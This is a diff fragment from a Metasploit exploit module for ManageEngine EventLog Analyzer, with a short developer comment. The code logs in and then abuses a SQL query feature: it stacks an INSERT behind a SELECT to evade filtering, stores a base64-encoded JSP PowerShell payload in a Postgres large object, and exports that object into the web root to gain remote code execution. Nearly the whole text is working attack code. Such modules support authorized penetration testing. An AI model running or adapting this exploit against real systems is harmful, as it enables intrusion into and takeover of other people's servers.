modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb

```diff
@@ -0,0 +1,219 @@
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, "event", "index3.do"),
+    })
+
+    if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/
+      jsessionid = $1
+      print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!")
+    end
+
+    print_status("#{peer} - Access login page")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, "event", "j_security_check;jsessionid=#{jsessionid}"),
+      'vars_post' => {
+        'forChecking' => 'null',
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['PASSWORD'],
+        'domains' => "Local Authentication\r\n",
+        'loginButton' => 'Login',
+        'optionValue' => 'hide'
+      }
+    })
+
+    if res && res.code == 302
+      redirect =  URI(res.headers['Location'])
+      print_status("#{peer} - Location is [ #{redirect} ]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
+    end
+
+
+    # Follow redirection process
+    print_status("#{peer} - Following redirection")
+    res = send_request_cgi({
+      'uri' => "#{redirect}",
+      'method' => 'GET'
+    })
+
+    if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/
+      cookies = res.get_cookies
+      print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!")
+    end
+
+
+    jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp'
+
+    cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '')
+
+
+    print_status("#{peer} - Executing SQL queries")
+
+    # Remove large object in database, just in case it exists from previous exploit attempts
+    sql = "SELECT lo_unlink(-1)"
+    result = sql_query(cookies, sql)
+
+    # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
+    sql = "SELECT lo_create(-1)"
+    result = sql_query(cookies, sql)
+    if result.body =~ /menuItemRow\">([0-9]+)/
+      loid = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
+    end
+
+    select_random = rand_text_numeric(2 + rand(6 - 2))
+    # Insert JSP payload into the pg_largeobject table. We have to use "SELECT" first to to bypass OpManager's checks for queries starting with INSERT/UPDATE/DELETE, etc.
+    sql = "SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--"
+
+
+    result = sql_query(cookies, sql)
+
+    # Export our large object id data into a WAR file
+    sql = "SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');"
```

Comment:
Initially I tried to deploy a WAR but unlike in my other OpManager exploit, automatic deploying is not available (afaik).